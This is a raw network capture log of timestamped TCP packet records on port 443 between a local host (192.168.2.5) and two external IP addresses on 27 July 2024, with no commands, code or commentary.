Jul 27, 2024 07:30:21.357022047 CEST	51812	443	192.168.2.5	185.149.100.242
Jul 27, 2024 07:30:21.357037067 CEST	51812	443	192.168.2.5	185.149.100.242
Jul 27, 2024 07:30:21.366879940 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:21.366936922 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:21.366947889 CEST	51812	443	192.168.2.5	185.149.100.242
Jul 27, 2024 07:30:21.366962910 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:21.366996050 CEST	51812	443	192.168.2.5	185.149.100.242
Jul 27, 2024 07:30:21.367007017 CEST	51812	443	192.168.2.5	185.149.100.242
Jul 27, 2024 07:30:21.399482965 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:21.399525881 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:21.399568081 CEST	51812	443	192.168.2.5	185.149.100.242
Jul 27, 2024 07:30:21.399585009 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:21.399599075 CEST	51812	443	192.168.2.5	185.149.100.242
Jul 27, 2024 07:30:21.399625063 CEST	51812	443	192.168.2.5	185.149.100.242
Jul 27, 2024 07:30:21.431220055 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:21.431261063 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:21.431296110 CEST	51812	443	192.168.2.5	185.149.100.242
Jul 27, 2024 07:30:21.431303024 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:21.431333065 CEST	51812	443	192.168.2.5	185.149.100.242
Jul 27, 2024 07:30:21.431340933 CEST	51812	443	192.168.2.5	185.149.100.242
Jul 27, 2024 07:30:21.431349993 CEST	443	51814	107.173.160.137	192.168.2.5
Jul 27, 2024 07:30:21.431438923 CEST	51814	443	192.168.2.5	107.173.160.137
Jul 27, 2024 07:30:21.431463003 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:21.431504965 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:21.431535959 CEST	51812	443	192.168.2.5	185.149.100.242
Jul 27, 2024 07:30:21.431541920 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:21.431565046 CEST	51812	443	192.168.2.5	185.149.100.242
Jul 27, 2024 07:30:21.431586981 CEST	51812	443	192.168.2.5	185.149.100.242
Jul 27, 2024 07:30:21.431713104 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:21.431750059 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:21.431773901 CEST	51812	443	192.168.2.5	185.149.100.242
Jul 27, 2024 07:30:21.431778908 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:21.431807041 CEST	51812	443	192.168.2.5	185.149.100.242
Jul 27, 2024 07:30:21.431807041 CEST	51812	443	192.168.2.5	185.149.100.242
Jul 27, 2024 07:30:21.432400942 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:21.432441950 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:21.432465076 CEST	51812	443	192.168.2.5	185.149.100.242
Jul 27, 2024 07:30:21.432470083 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:21.432497025 CEST	51812	443	192.168.2.5	185.149.100.242
Jul 27, 2024 07:30:21.432518959 CEST	51812	443	192.168.2.5	185.149.100.242
Jul 27, 2024 07:30:21.433069944 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:21.433109999 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:21.433135986 CEST	51812	443	192.168.2.5	185.149.100.242
Jul 27, 2024 07:30:21.433141947 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:21.433165073 CEST	51812	443	192.168.2.5	185.149.100.242
Jul 27, 2024 07:30:21.433172941 CEST	51812	443	192.168.2.5	185.149.100.242
Jul 27, 2024 07:30:21.433648109 CEST	51814	443	192.168.2.5	107.173.160.137
Jul 27, 2024 07:30:21.433676958 CEST	443	51814	107.173.160.137	192.168.2.5
Jul 27, 2024 07:30:21.436531067 CEST	51814	443	192.168.2.5	107.173.160.137
Jul 27, 2024 07:30:21.436557055 CEST	443	51814	107.173.160.137	192.168.2.5
Jul 27, 2024 07:30:21.436659098 CEST	443	51814	107.173.160.137	192.168.2.5
Jul 27, 2024 07:30:21.437433004 CEST	51814	443	192.168.2.5	107.173.160.137
Jul 27, 2024 07:30:21.437489986 CEST	443	51814	107.173.160.137	192.168.2.5
Jul 27, 2024 07:30:21.437551022 CEST	51814	443	192.168.2.5	107.173.160.137
Jul 27, 2024 07:30:21.437562943 CEST	443	51814	107.173.160.137	192.168.2.5
Jul 27, 2024 07:30:21.438997030 CEST	51814	443	192.168.2.5	107.173.160.137
Jul 27, 2024 07:30:21.439065933 CEST	443	51814	107.173.160.137	192.168.2.5
Jul 27, 2024 07:30:21.439281940 CEST	51814	443	192.168.2.5	107.173.160.137
Jul 27, 2024 07:30:21.439301014 CEST	443	51814	107.173.160.137	192.168.2.5
Jul 27, 2024 07:30:21.439568043 CEST	51814	443	192.168.2.5	107.173.160.137
Jul 27, 2024 07:30:21.439585924 CEST	443	51814	107.173.160.137	192.168.2.5
Jul 27, 2024 07:30:21.439845085 CEST	51814	443	192.168.2.5	107.173.160.137
Jul 27, 2024 07:30:21.439862967 CEST	443	51814	107.173.160.137	192.168.2.5
Jul 27, 2024 07:30:21.440112114 CEST	51814	443	192.168.2.5	107.173.160.137
Jul 27, 2024 07:30:21.440128088 CEST	443	51814	107.173.160.137	192.168.2.5
Jul 27, 2024 07:30:21.440392017 CEST	51814	443	192.168.2.5	107.173.160.137
Jul 27, 2024 07:30:21.440409899 CEST	443	51814	107.173.160.137	192.168.2.5
Jul 27, 2024 07:30:21.440670967 CEST	51814	443	192.168.2.5	107.173.160.137
Jul 27, 2024 07:30:21.440690041 CEST	443	51814	107.173.160.137	192.168.2.5
Jul 27, 2024 07:30:21.440937042 CEST	51814	443	192.168.2.5	107.173.160.137
Jul 27, 2024 07:30:21.440954924 CEST	443	51814	107.173.160.137	192.168.2.5
Jul 27, 2024 07:30:21.441095114 CEST	51814	443	192.168.2.5	107.173.160.137
Jul 27, 2024 07:30:21.441108942 CEST	443	51814	107.173.160.137	192.168.2.5
Jul 27, 2024 07:30:21.443236113 CEST	51812	443	192.168.2.5	185.149.100.242
Jul 27, 2024 07:30:21.447421074 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:21.447443962 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:21.447484970 CEST	51812	443	192.168.2.5	185.149.100.242
Jul 27, 2024 07:30:21.447491884 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:21.447515011 CEST	51812	443	192.168.2.5	185.149.100.242
Jul 27, 2024 07:30:21.447530985 CEST	51812	443	192.168.2.5	185.149.100.242
Jul 27, 2024 07:30:21.457509041 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:21.457528114 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:21.457576990 CEST	51812	443	192.168.2.5	185.149.100.242
Jul 27, 2024 07:30:21.457585096 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:21.457609892 CEST	51812	443	192.168.2.5	185.149.100.242
Jul 27, 2024 07:30:21.457618952 CEST	51812	443	192.168.2.5	185.149.100.242
Jul 27, 2024 07:30:21.490221977 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:21.490262032 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:21.490304947 CEST	51812	443	192.168.2.5	185.149.100.242
Jul 27, 2024 07:30:21.490312099 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:21.490340948 CEST	51812	443	192.168.2.5	185.149.100.242
Jul 27, 2024 07:30:21.490356922 CEST	51812	443	192.168.2.5	185.149.100.242
Jul 27, 2024 07:30:21.524539948 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:21.524584055 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:21.524621964 CEST	51812	443	192.168.2.5	185.149.100.242
Jul 27, 2024 07:30:21.524627924 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:21.524655104 CEST	51812	443	192.168.2.5	185.149.100.242
Jul 27, 2024 07:30:21.524663925 CEST	51812	443	192.168.2.5	185.149.100.242
Jul 27, 2024 07:30:21.524729013 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:21.524768114 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:21.524787903 CEST	51812	443	192.168.2.5	185.149.100.242
Jul 27, 2024 07:30:21.524794102 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:21.524822950 CEST	51812	443	192.168.2.5	185.149.100.242
Jul 27, 2024 07:30:21.524832010 CEST	51812	443	192.168.2.5	185.149.100.242
Jul 27, 2024 07:30:21.524966955 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:21.525007010 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:21.525032043 CEST	51812	443	192.168.2.5	185.149.100.242
Jul 27, 2024 07:30:21.525038004 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:21.525062084 CEST	51812	443	192.168.2.5	185.149.100.242
Jul 27, 2024 07:30:21.525070906 CEST	51812	443	192.168.2.5	185.149.100.242
Jul 27, 2024 07:30:21.525171041 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:21.525211096 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:21.525233984 CEST	51812	443	192.168.2.5	185.149.100.242
Jul 27, 2024 07:30:21.525249004 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:21.525281906 CEST	51812	443	192.168.2.5	185.149.100.242
Jul 27, 2024 07:30:21.525387049 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:21.525434971 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:21.525435925 CEST	51812	443	192.168.2.5	185.149.100.242
Jul 27, 2024 07:30:21.525444031 CEST	51812	443	192.168.2.5	185.149.100.242
Jul 27, 2024 07:30:21.525460958 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:21.525496006 CEST	51812	443	192.168.2.5	185.149.100.242
Jul 27, 2024 07:30:21.525516987 CEST	51812	443	192.168.2.5	185.149.100.242
Jul 27, 2024 07:30:21.538065910 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:21.538084984 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:21.538136005 CEST	51812	443	192.168.2.5	185.149.100.242
Jul 27, 2024 07:30:21.538141966 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:21.538167953 CEST	51812	443	192.168.2.5	185.149.100.242
Jul 27, 2024 07:30:21.538184881 CEST	51812	443	192.168.2.5	185.149.100.242
Jul 27, 2024 07:30:21.548584938 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:21.548604012 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:21.548645973 CEST	51812	443	192.168.2.5	185.149.100.242
Jul 27, 2024 07:30:21.548652887 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:21.548665047 CEST	51812	443	192.168.2.5	185.149.100.242
Jul 27, 2024 07:30:21.548691034 CEST	51812	443	192.168.2.5	185.149.100.242
Jul 27, 2024 07:30:21.580965996 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:21.581008911 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:21.581037998 CEST	51812	443	192.168.2.5	185.149.100.242
Jul 27, 2024 07:30:21.581043959 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:21.581063986 CEST	51812	443	192.168.2.5	185.149.100.242
Jul 27, 2024 07:30:21.581083059 CEST	51812	443	192.168.2.5	185.149.100.242
Jul 27, 2024 07:30:21.613157034 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:21.613203049 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:21.613264084 CEST	51812	443	192.168.2.5	185.149.100.242
Jul 27, 2024 07:30:21.613272905 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:21.613301039 CEST	51812	443	192.168.2.5	185.149.100.242
Jul 27, 2024 07:30:21.613310099 CEST	51812	443	192.168.2.5	185.149.100.242
Jul 27, 2024 07:30:21.615329027 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:21.615367889 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:21.615405083 CEST	51812	443	192.168.2.5	185.149.100.242
Jul 27, 2024 07:30:21.615410089 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:21.615437031 CEST	51812	443	192.168.2.5	185.149.100.242
Jul 27, 2024 07:30:21.615447044 CEST	51812	443	192.168.2.5	185.149.100.242
Jul 27, 2024 07:30:21.615525961 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:21.615562916 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:21.615591049 CEST	51812	443	192.168.2.5	185.149.100.242
Jul 27, 2024 07:30:21.615596056 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:21.615619898 CEST	51812	443	192.168.2.5	185.149.100.242
Jul 27, 2024 07:30:21.615632057 CEST	51812	443	192.168.2.5	185.149.100.242
Jul 27, 2024 07:30:21.616122007 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:21.616163015 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:21.616200924 CEST	51812	443	192.168.2.5	185.149.100.242
Jul 27, 2024 07:30:21.616205931 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:21.616230965 CEST	51812	443	192.168.2.5	185.149.100.242
Jul 27, 2024 07:30:21.616240978 CEST	51812	443	192.168.2.5	185.149.100.242
Jul 27, 2024 07:30:21.616338968 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:21.616378069 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:21.616400957 CEST	51812	443	192.168.2.5	185.149.100.242
Jul 27, 2024 07:30:21.616406918 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:21.616431952 CEST	51812	443	192.168.2.5	185.149.100.242
Jul 27, 2024 07:30:21.616441965 CEST	51812	443	192.168.2.5	185.149.100.242
Jul 27, 2024 07:30:21.628890991 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:21.628935099 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:21.628963947 CEST	51812	443	192.168.2.5	185.149.100.242
Jul 27, 2024 07:30:21.628969908 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:21.628993988 CEST	51812	443	192.168.2.5	185.149.100.242
Jul 27, 2024 07:30:21.629010916 CEST	51812	443	192.168.2.5	185.149.100.242
Jul 27, 2024 07:30:21.639516115 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:21.639537096 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:21.639586926 CEST	51812	443	192.168.2.5	185.149.100.242
Jul 27, 2024 07:30:21.639595032 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:21.639622927 CEST	51812	443	192.168.2.5	185.149.100.242
Jul 27, 2024 07:30:21.639631987 CEST	51812	443	192.168.2.5	185.149.100.242
Jul 27, 2024 07:30:21.672569990 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:21.672615051 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:21.672646046 CEST	51812	443	192.168.2.5	185.149.100.242
Jul 27, 2024 07:30:21.672652960 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:21.672682047 CEST	51812	443	192.168.2.5	185.149.100.242
Jul 27, 2024 07:30:21.672693968 CEST	51812	443	192.168.2.5	185.149.100.242
Jul 27, 2024 07:30:21.703974009 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:21.704015970 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:21.704118013 CEST	51812	443	192.168.2.5	185.149.100.242
Jul 27, 2024 07:30:21.704118013 CEST	51812	443	192.168.2.5	185.149.100.242
Jul 27, 2024 07:30:21.704133034 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:21.706260920 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:21.706307888 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:21.706351042 CEST	51812	443	192.168.2.5	185.149.100.242
Jul 27, 2024 07:30:21.706357002 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:21.706377983 CEST	51812	443	192.168.2.5	185.149.100.242
Jul 27, 2024 07:30:21.706409931 CEST	51812	443	192.168.2.5	185.149.100.242
Jul 27, 2024 07:30:21.706638098 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:21.706677914 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:21.706702948 CEST	51812	443	192.168.2.5	185.149.100.242
Jul 27, 2024 07:30:21.706717014 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:21.706749916 CEST	51812	443	192.168.2.5	185.149.100.242
Jul 27, 2024 07:30:21.706758976 CEST	51812	443	192.168.2.5	185.149.100.242
Jul 27, 2024 07:30:21.706876040 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:21.706914902 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:21.706938028 CEST	51812	443	192.168.2.5	185.149.100.242
Jul 27, 2024 07:30:21.706943035 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:21.706973076 CEST	51812	443	192.168.2.5	185.149.100.242
Jul 27, 2024 07:30:21.706983089 CEST	51812	443	192.168.2.5	185.149.100.242
Jul 27, 2024 07:30:21.707062960 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:21.707104921 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:21.707122087 CEST	51812	443	192.168.2.5	185.149.100.242
Jul 27, 2024 07:30:21.707134008 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:21.707164049 CEST	51812	443	192.168.2.5	185.149.100.242
Jul 27, 2024 07:30:21.707174063 CEST	51812	443	192.168.2.5	185.149.100.242
Jul 27, 2024 07:30:21.719738960 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:21.719779968 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:21.719810009 CEST	51812	443	192.168.2.5	185.149.100.242
Jul 27, 2024 07:30:21.719815016 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:21.719849110 CEST	51812	443	192.168.2.5	185.149.100.242
Jul 27, 2024 07:30:21.719937086 CEST	51812	443	192.168.2.5	185.149.100.242
Jul 27, 2024 07:30:21.730318069 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:21.730360031 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:21.730397940 CEST	51812	443	192.168.2.5	185.149.100.242
Jul 27, 2024 07:30:21.730406046 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:21.730434895 CEST	51812	443	192.168.2.5	185.149.100.242
Jul 27, 2024 07:30:21.730444908 CEST	51812	443	192.168.2.5	185.149.100.242
Jul 27, 2024 07:30:21.763329029 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:21.763350964 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:21.763426065 CEST	51812	443	192.168.2.5	185.149.100.242
Jul 27, 2024 07:30:21.763433933 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:21.765954971 CEST	51812	443	192.168.2.5	185.149.100.242
Jul 27, 2024 07:30:21.794845104 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:21.794886112 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:21.794938087 CEST	51812	443	192.168.2.5	185.149.100.242
Jul 27, 2024 07:30:21.794944048 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:21.794976950 CEST	51812	443	192.168.2.5	185.149.100.242
Jul 27, 2024 07:30:21.794990063 CEST	51812	443	192.168.2.5	185.149.100.242
Jul 27, 2024 07:30:21.796719074 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:21.796760082 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:21.796789885 CEST	51812	443	192.168.2.5	185.149.100.242
Jul 27, 2024 07:30:21.796797037 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:21.796823025 CEST	51812	443	192.168.2.5	185.149.100.242
Jul 27, 2024 07:30:21.796838999 CEST	51812	443	192.168.2.5	185.149.100.242
Jul 27, 2024 07:30:21.797131062 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:21.797185898 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:21.797195911 CEST	51812	443	192.168.2.5	185.149.100.242
Jul 27, 2024 07:30:21.797209024 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:21.797250986 CEST	51812	443	192.168.2.5	185.149.100.242
Jul 27, 2024 07:30:21.797261953 CEST	51812	443	192.168.2.5	185.149.100.242
Jul 27, 2024 07:30:21.797489882 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:21.797530890 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:21.797557116 CEST	51812	443	192.168.2.5	185.149.100.242
Jul 27, 2024 07:30:21.797566891 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:21.797583103 CEST	51812	443	192.168.2.5	185.149.100.242
Jul 27, 2024 07:30:21.797627926 CEST	51812	443	192.168.2.5	185.149.100.242
Jul 27, 2024 07:30:21.797779083 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:21.797836065 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:21.797852993 CEST	51812	443	192.168.2.5	185.149.100.242
Jul 27, 2024 07:30:21.797858953 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:21.797889948 CEST	51812	443	192.168.2.5	185.149.100.242
Jul 27, 2024 07:30:21.797899961 CEST	51812	443	192.168.2.5	185.149.100.242
Jul 27, 2024 07:30:21.810225010 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:21.810267925 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:21.810321093 CEST	51812	443	192.168.2.5	185.149.100.242
Jul 27, 2024 07:30:21.810328007 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:21.810369968 CEST	51812	443	192.168.2.5	185.149.100.242
Jul 27, 2024 07:30:21.810380936 CEST	51812	443	192.168.2.5	185.149.100.242
Jul 27, 2024 07:30:21.820837975 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:21.820884943 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:21.820921898 CEST	51812	443	192.168.2.5	185.149.100.242
Jul 27, 2024 07:30:21.820943117 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:21.820957899 CEST	51812	443	192.168.2.5	185.149.100.242
Jul 27, 2024 07:30:21.820981979 CEST	51812	443	192.168.2.5	185.149.100.242
Jul 27, 2024 07:30:21.853601933 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:21.853625059 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:21.853667021 CEST	51812	443	192.168.2.5	185.149.100.242
Jul 27, 2024 07:30:21.853673935 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:21.853703976 CEST	51812	443	192.168.2.5	185.149.100.242
Jul 27, 2024 07:30:21.853719950 CEST	51812	443	192.168.2.5	185.149.100.242
Jul 27, 2024 07:30:21.886188984 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:21.886236906 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:21.886292934 CEST	51812	443	192.168.2.5	185.149.100.242
Jul 27, 2024 07:30:21.886301994 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:21.886332035 CEST	51812	443	192.168.2.5	185.149.100.242
Jul 27, 2024 07:30:21.886341095 CEST	51812	443	192.168.2.5	185.149.100.242
Jul 27, 2024 07:30:21.888221979 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:21.888261080 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:21.888298988 CEST	51812	443	192.168.2.5	185.149.100.242
Jul 27, 2024 07:30:21.888304949 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:21.888333082 CEST	51812	443	192.168.2.5	185.149.100.242
Jul 27, 2024 07:30:21.888467073 CEST	51812	443	192.168.2.5	185.149.100.242
Jul 27, 2024 07:30:21.888645887 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:21.888686895 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:21.888712883 CEST	51812	443	192.168.2.5	185.149.100.242
Jul 27, 2024 07:30:21.888719082 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:21.888737917 CEST	51812	443	192.168.2.5	185.149.100.242
Jul 27, 2024 07:30:21.888752937 CEST	51812	443	192.168.2.5	185.149.100.242
Jul 27, 2024 07:30:21.888873100 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:21.888914108 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:21.888952971 CEST	51812	443	192.168.2.5	185.149.100.242
Jul 27, 2024 07:30:21.888968945 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:21.888983011 CEST	51812	443	192.168.2.5	185.149.100.242
Jul 27, 2024 07:30:21.889019012 CEST	51812	443	192.168.2.5	185.149.100.242
Jul 27, 2024 07:30:21.889298916 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:21.889339924 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:21.889363050 CEST	51812	443	192.168.2.5	185.149.100.242
Jul 27, 2024 07:30:21.889368057 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:21.889394999 CEST	51812	443	192.168.2.5	185.149.100.242
Jul 27, 2024 07:30:21.889404058 CEST	51812	443	192.168.2.5	185.149.100.242
Jul 27, 2024 07:30:21.901443005 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:21.901496887 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:21.901527882 CEST	51812	443	192.168.2.5	185.149.100.242
Jul 27, 2024 07:30:21.901534081 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:21.901567936 CEST	51812	443	192.168.2.5	185.149.100.242
Jul 27, 2024 07:30:21.901592970 CEST	51812	443	192.168.2.5	185.149.100.242
Jul 27, 2024 07:30:21.912869930 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:21.912911892 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:21.912952900 CEST	51812	443	192.168.2.5	185.149.100.242
Jul 27, 2024 07:30:21.912960052 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:21.912987947 CEST	51812	443	192.168.2.5	185.149.100.242
Jul 27, 2024 07:30:21.912997007 CEST	51812	443	192.168.2.5	185.149.100.242
Jul 27, 2024 07:30:21.945065975 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:21.945100069 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:21.945147038 CEST	51812	443	192.168.2.5	185.149.100.242
Jul 27, 2024 07:30:21.945153952 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:21.945187092 CEST	51812	443	192.168.2.5	185.149.100.242
Jul 27, 2024 07:30:21.945197105 CEST	51812	443	192.168.2.5	185.149.100.242
Jul 27, 2024 07:30:21.977039099 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:21.977065086 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:21.977123976 CEST	51812	443	192.168.2.5	185.149.100.242
